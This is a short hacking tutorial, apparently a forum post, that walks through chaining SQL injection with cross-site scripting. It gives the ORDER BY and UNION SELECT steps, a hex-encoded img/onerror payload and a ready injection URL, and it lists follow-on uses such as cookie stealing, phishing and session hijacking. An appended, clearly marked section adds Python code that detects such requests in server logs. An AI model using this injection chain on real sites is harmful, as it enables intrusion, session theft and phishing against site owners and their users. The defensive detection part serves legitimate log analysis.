I am going to show you how to attack a website using XSS (cross-site scripting) combined with SQLi (SQL injection).
- This is pretty simple! We just have to inject our JavaScript code into the website.
Step 1: First we have to find a site that is vulnerable to SQLi.
Like this:
http://www.site.in/index.php?id=3
Step 2: Find the number of columns on the site using the ORDER BY method.
- Suppose our site has 9 columns!
Step 3: Find the vulnerable column using the UNION ALL SELECT method.
- And the most vulnerable column is 3!
Step 4: Now we will inject our XSS payload into it. To make things simple we will encode our payload into hex.
Our XSS injection Payload
<img src=x onerror=confirm(/XSS/)>
Our Hex Encoded Payload
0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
Step 5: Injecting The Payload Into Our Site!
Like This:
http://site.com/index.php?id=-3' union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4,5,6,7,8,9--+
NOTE:
The above URL will output our XSS payload into the website, because the page prints the value of column 3 into its HTML without encoding it. This is a basic XSS payload; from here we are free to do other things using XSS, like cookie stealing, XSS phishing, XSS iframe phishing, chained XSS, session hijacking, CSRF attacks, XSS DDoS and other attacks.
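Seen from the defender's side, the request in Step 5 stands out in web server logs: a UNION SELECT in a parameter plus a hex literal that decodes to HTML. The following is an added example, not part of the original post, that decodes hex literals in query parameters and flags the ones carrying markup; the function names inspect_request and scan and the 0xdeadbeef sample are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# A hex literal of at least four bytes, e.g. 0x3c696d67...
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2}){4,})")
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)
# HTML tag, inline event handler or javascript: URL in the decoded bytes.
MARKUP = re.compile(r"<\s*\w+[^>]*>|\bon\w+\s*=|javascript:", re.I)

def inspect_request(url):
    """Return (parameter, finding, decoded_text) tuples for one request URL."""
    findings = []
    # parse_qsl undoes percent-encoding and turns '+' into a space.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if UNION_SELECT.search(value):
            findings.append((name, "union-select", None))
        for match in HEX_LITERAL.finditer(value):
            decoded = bytes.fromhex(match.group(1)).decode("utf-8", "replace")
            if MARKUP.search(decoded):
                findings.append((name, "hex-encoded-markup", decoded))
    return findings

def scan(urls):
    """Map each flagged URL to its findings; clean requests are left out."""
    return {u: f for u in urls if (f := inspect_request(u))}

# Constructed sample requests: the two URLs shown on this page plus an
# unrelated hex value that decodes to no markup.
HEX = "3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e"
SAMPLES = [
    "http://www.site.in/index.php?id=3",
    "http://site.com/index.php?id=-3'%20union%20select%201,2,0x" + HEX
    + ",4,5,6,7,8,9--+",
    "http://www.site.in/index.php?id=3&color=0xdeadbeef",
]

if __name__ == "__main__":
    for url, found in scan(SAMPLES).items():
        for name, kind, decoded in found:
            print(f"{kind} in parameter {name!r}: {decoded!r}")
```

A hit from this check is a signal for triage; the fix on the application side is a parameterized query for id and HTML encoding of every value printed into the page.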
